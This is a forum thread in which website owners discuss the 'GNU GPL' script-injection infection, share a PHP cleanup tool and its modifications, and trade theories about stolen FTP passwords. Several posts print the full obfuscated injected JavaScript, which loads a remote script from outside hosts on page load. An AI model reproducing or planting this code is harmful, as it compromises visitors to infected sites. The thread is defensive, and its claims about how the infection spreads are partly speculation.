Thread: <script>/*GNU GPL*/ try{window.onload = function(){var

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

HERE IS HOW TO FIX IT IN 4 EASY STEPS
(UPDATED AGAIN 12th January -this script has been downloaded over 7,500 times!)


1) Download this file: Cure GNU GPL Virus File (Curevir.php)
2) Extract the file contained in it, its called: curevir.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: http://YOURWEBSITENAME.COM/curevir.php


Thats it, it will take a seconds to a few minutes depending on how large your website is, it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once its done its thing, and you are happy that the virus is gone, then you can delete your backups.

IMPORTANT - you must now change all your ftp passwords, they have been compromised, and your website will be re-infected unless you do this immediately.
If you find this tool useful, PLEASE link to us!



EXAMPLE OF THE FULL CODE:

Code:

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 
'myscript1');X08yhffhg7xkxf.setAttribute('src',  'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8&#0$8^!!0#@$/@^#n^$o#&!v@!!
i@#@n)k))y!(#.@$c&#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!
n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^
#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 
'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>

It attacks any webpage that it finds on your server that meet the following criteria:

filename =
index*
default*
*.js

UPDATE

Just found a new version, it looks like this: the original script should still solve the problem though....

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.se tAttribute('type',
'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)
n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(! c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n &))^(.!#r^$^u!!)^!8&#0$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#(^#z)@
#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&
#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute
('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf) ;}} catch(e) {}</script>

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.se tAttribute
('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)
t($r&a)$)v$i)a)@)n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(! c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o
)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!# r^$^u!!)^!8&#0$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&
#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d
(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, '')
);X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf) ;}} catch(e) {}</script><script>/*GNU GPL*
/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.se tAttribute('type', 'text/javascript')
;X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-$@@
(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@ #&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)
j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8&#0$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#
(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p
)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));
X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf) ;}} catch(e) {}</script>

Bonjour,
Sorry for my english but i'm french.
I was infected bu this code and i applied your code.
I think, some js files still inifected, i'll resolve later.
I have a question, i see when i refresh a page, a link in the footer of the browser but it's too quickly, i don' find the link on my apache log.
Have you got an idea ?

no problems about your english!! its better than my French!

Anyway, Im not sure what the link is that you mean, do you have a screenshot that I can look at?

thanks!

MOGmartin

[QUOTE=MOGmartin;424]THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

[code]<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.se tAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id',
'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(! c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n &))^(.!#r^$^u!!)^!8

Originally Posted by MOGmartin

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

MOGmartin

Thanks for this. Every one of my domains got hit with it. I had found the ones in the index* and default* files but didn't know about the *.js.

The tool you recommended fixed them all up in no time. Lifesaver!

Will link to you for sure!

Cheers

Stan

Thanks for the script, it was a great start. Unfortunately it does not work well on a site that has thousands of files. The script is very memory intensive and slow because it is reading the full file into memory and then doing a full text search on the file in memory.

We should avoid this, and leverage shell commands to make things faster and less memory intensive.

I made the following enhancement to the check_file() function that you might consider including in your script:

/* START check_file function */

function check_file($file){

global $count;

$ptrn = "/(php|html|shtml|htm|js|tpl|inc)$/";

$virus_string = '/*GNU GPL*/ try{window.onload = function(){var';



if (preg_match($ptrn, $file['filename'])) {
//run a shell command to grep files instead of loading into memory
$execoutput = exec("fgrep -l '{$virus_string}' ".escapeshellarg($file['path']));//EDIT added escapeshellarg()

if($execoutput){
//echo a little output so we see progress
//echo $execoutput.' ';
$count++;
return $file;
}


/************************
*************************
//commented out this section, no more full file in memory
$contents = file_get_contents($file['path']);


if (strpos ($contents, $virus_string) !== false && $file['filename'] != 'curevir.php' ){
//pa($file['dirpath'].'/'.$file['filename']);
if ($count == 0) {
//chmod($file['dirpath'], 0777);



}

//pa($file);

$count++;

return $file;


}
******************/

}

return false;

}

/* END check_file function */

This modification took the script from trying to consume over 1 Gig of RAM and 20+ minutes to quick response (3-4 mins) and negligible memory / CPU usage.

charles
www.forthecode.org

In my example, you may need to add back the code to prevent the script from detecting itself
Again, thanks for posting your script!
charles
www.forthecode.org

Ive got a fix for these issues, thanks for posting them by the way - I will upload the new script today,

cheers!

MOGmartin

Hi guys,

the files on my webspace were also affected by this virus.
thanks to my webhoster who had a backup, the damage caused was not that bad.

but now I have a question to you: how did they get onto my FTP-Server?
I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

thank you all,
kind regards from Germany!

Originally Posted by mbaum

Hi guys,

the files on my webspace were also affected by this virus.
thanks to my webhoster who had a backup, the damage caused was not that bad.

but now I have a question to you: how did they get onto my FTP-Server?
I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

thank you all,
kind regards from Germany!

The virus arrives on your machine after visiting an infected webpage, it scans for any common ftp program installed, then harvests any saved passwords and uploads them to their server in china.

once they have your passwords they begin infecting your sites as well.

so, once your sites have been infected, you 100% know that all your saved ftp passwords have also been comprimised.

scary!

I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

BTW it also hits files that start with the word "main".

Originally Posted by MOGmartin

MOGmartin

Hi.
I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
Help.

Originally Posted by Hitbyvirus

I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

BTW it also hits files that start with the word "main".

Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

finally, thanks for posting mate, your input is much appreciated!

MOGmartin

Originally Posted by SergST

Hi.
I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
Help.

Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

thanks

MOGmartin

Originally Posted by MOGmartin

Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

finally, thanks for posting mate, your input is much appreciated!

MOGmartin

Happy to be here .

Been reading on Gumblar and every article I read points toward that being the root. Or a variant. I simply went to a site to attempt to book a hotel for a night.

So far on my servers here is the hit list:

Any file that starts with index and ends in .php, .htm, .html (index_90210.htm would qualify)
Any file that starts with default and ends in the extensions above.
Any file that starts with main and ends with the extensions above.
Any file ending in .js

If anyone knows of more please post it here.

Originally Posted by MOGmartin

Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

thanks

MOGmartin

Hello!
ок and how me to scan folders having CMOD 777? I know precisely, there there is in files this script-virus. Start from such folders a remove_virus.php I can not.

Sorry my english!
Thanks.


Tree site:

|
public_html (777)
| -remove_virus.php(is not work)
index.php
|
system(777)--remove_virus.php(is not work)
| -application(777) (virus!!!)
| -cache(755)
| -database(755) (virus!!!)
| -libraries(755) (virus!!!)
| -.....
forum(755)-remove_virus.php(is work, but scan folder forum and under folder forum)
| -...
|
...

[QUOTE=MOGmartin;424]THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

Code:

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf

I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

Thank you!

Originally Posted by mbauer

I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

Thank you!

you need to firstly, change all your ftp passwords.

Then run a spyware sweep using avast software, someone sent me a PM this morning to let me know that this antivirus NOW finds the infected files.